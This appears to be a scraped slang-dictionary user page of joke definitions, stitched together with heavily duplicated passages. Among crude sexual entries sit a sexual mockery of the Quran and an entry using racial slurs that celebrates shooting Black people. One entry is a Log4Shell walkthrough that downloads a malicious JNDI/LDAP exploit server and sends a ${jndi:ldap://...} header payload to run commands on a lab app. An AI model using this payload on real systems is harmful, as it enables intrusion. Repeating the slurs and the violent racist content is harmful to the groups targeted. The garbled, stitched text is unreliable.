by Bad C dev August 26, 2021
I had a threesome with two hot chicks and the cuntts were amazing.
I saw two idiots trying to figure out how to open a door. What a bunch of cuntts!
Which cuntt do you choose? Mine or her's? YOU MUST DECIDE!
I saw two idiots trying to figure out how to open a door. What a bunch of cuntts!
Which cuntt do you choose? Mine or her's? YOU MUST DECIDE!
by Bad C dev July 25, 2021
Pronounced Quran-gasm, it describes an orgasm one attains from reading erotic sections of the Quran. Qurangasms are most common in female Muslims, although they can happen to anyone, especially if the person has a fetish for tiny bold words crammed as tight as possible on large sheets of paper with that beautiful sexy margin to give you space and room to think.
Jasmin: I had the best sex ever last night.
Erina: What did you do differently?
Jasmin: My hushand and I engaged in foreplay by reciting verses from the Quran prior to sex.
Erina: How did you stave off a Qurangasm?
Jasmin: I didn't. My husband gave me the best anal right as I orgasmed.
Erina: That's so hot.
*Jasmin and Erina make out because they are secretly star-crossed lesbian lovers.*
Erina: What did you do differently?
Jasmin: My hushand and I engaged in foreplay by reciting verses from the Quran prior to sex.
Erina: How did you stave off a Qurangasm?
Jasmin: I didn't. My husband gave me the best anal right as I orgasmed.
Erina: That's so hot.
*Jasmin and Erina make out because they are secretly star-crossed lesbian lovers.*
by Bad C dev February 26, 2021
The Java Naming and Directory Interface (JNDI) allows for lookup of Java objects at program runtime given a path to their data. JNDI can leverage several directory interfaces, each providing a different scheme of looking up files. Among these interfaces is the Lightweight Directory Access Protocol (LDAP), a non-Java-specific protocol which retrieves the object data as a URL from an appropriate server, either local or anywhere on the Internet.
In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form ${prefix:name}. For example, Text: ${java:version} might be converted to Text: Java version 1.7.0_67. Among the recognized expressions is ${jndi:<lookup>}; by specifying the lookup to be through LDAP, an arbitrary URL may be queried and loaded as Java object data. ${jndi:ldap://example.com/file}, for example, will load data from that URL if connected to the Internet. By inputting a string that is logged, an attacker can load and execute malicious code hosted on a public URL. Even if execution of the data is disabled, an attacker can still retrieve data—such as secret environment variables—by placing them in the URL, in which they will be substituted and sent to the attacker's server. Besides LDAP, other potentially exploitable JNDI lookup protocols include its secure variant LDAPS, Java Remote Method Invocation (RMI), the Domain Name System (DNS), and the Internet Inter-ORB Protocol (IIOP).
In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form ${prefix:name}. For example, Text: ${java:version} might be converted to Text: Java version 1.7.0_67. Among the recognized expressions is ${jndi:<lookup>}; by specifying the lookup to be through LDAP, an arbitrary URL may be queried and loaded as Java object data. ${jndi:ldap://example.com/file}, for example, will load data from that URL if connected to the Internet. By inputting a string that is logged, an attacker can load and execute malicious code hosted on a public URL. Even if execution of the data is disabled, an attacker can still retrieve data—such as secret environment variables—by placing them in the URL, in which they will be substituted and sent to the attacker's server. Besides LDAP, other potentially exploitable JNDI lookup protocols include its secure variant LDAPS, Java Remote Method Invocation (RMI), the Domain Name System (DNS), and the Internet Inter-ORB Protocol (IIOP).
To execute commands with Log4Shell, I’ll be spinning up an LDAP server with the capabilities to exploit JNDI injection attacks written by feihong-cs. Run the following to download the malicious LDAP server:
cd /tmp
wget --quiet github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zipunzip JNDIExploit.v1.2.zip
With the ZIP archive decompressed, we can retrieve the programs help menu with the following command:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -h
To start the malicious LDAP server on localhost:1389 (there will also be an HTTP server spun up on port 9001. Looking at the source code tells me that this is where the actual malicious Java class is being loaded from), run the following command:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 127.0.0.1 -p 9001
And finally, to obtain our reverse shell, let’s base64 encode a echo command to write some data into a file in the /tmp folder (make sure to get rid of the + sign by adding extra spaces as needed):
echo -n 'echo "you have been pwned" > /tmp/note.txt' | base64 -w 0
And then make the following request to the vulnerable application:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/Basic/Command/Base64/ZWNobyAieW91IGhhdmUgYmVlbiBwd25lZCIgPiAvdG1wL25vdGUudHh0}'
We can then confirm that the command was executed by going into the container with docker exec -it log4shell-app sh and then confirm that the file note.txt was created in the /tmp folder:
cd /tmp
wget --quiet github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zipunzip JNDIExploit.v1.2.zip
With the ZIP archive decompressed, we can retrieve the programs help menu with the following command:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -h
To start the malicious LDAP server on localhost:1389 (there will also be an HTTP server spun up on port 9001. Looking at the source code tells me that this is where the actual malicious Java class is being loaded from), run the following command:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 127.0.0.1 -p 9001
And finally, to obtain our reverse shell, let’s base64 encode a echo command to write some data into a file in the /tmp folder (make sure to get rid of the + sign by adding extra spaces as needed):
echo -n 'echo "you have been pwned" > /tmp/note.txt' | base64 -w 0
And then make the following request to the vulnerable application:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/Basic/Command/Base64/ZWNobyAieW91IGhhdmUgYmVlbiBwd25lZCIgPiAvdG1wL25vdGUudHh0}'
We can then confirm that the command was executed by going into the container with docker exec -it log4shell-app sh and then confirm that the file note.txt was created in the /tmp folder:
by Bad C dev December 15, 2021
by Bad C dev March 01, 2021
V.: to chicafuck is to fuck around in Chicago
N.: a chicafuck is an instance of fuckery committed in Chicago
N.: a chicafuck is an instance of fuckery committed in Chicago
Bro let’s go up to black town and chicafuck up those niggas
Bro those niggas to dared retaliate to our chicafuck, so we got out the guns and shot them shits dead
Bro those niggas to dared retaliate to our chicafuck, so we got out the guns and shot them shits dead
by Bad C dev November 13, 2024
Abbreviation for Zelda HeadQuarters. Zelda is a popular series of video games, comics, action figures, discontinued pre-releases, countless collectibles, and Zelda itself.
by Bad C dev February 28, 2021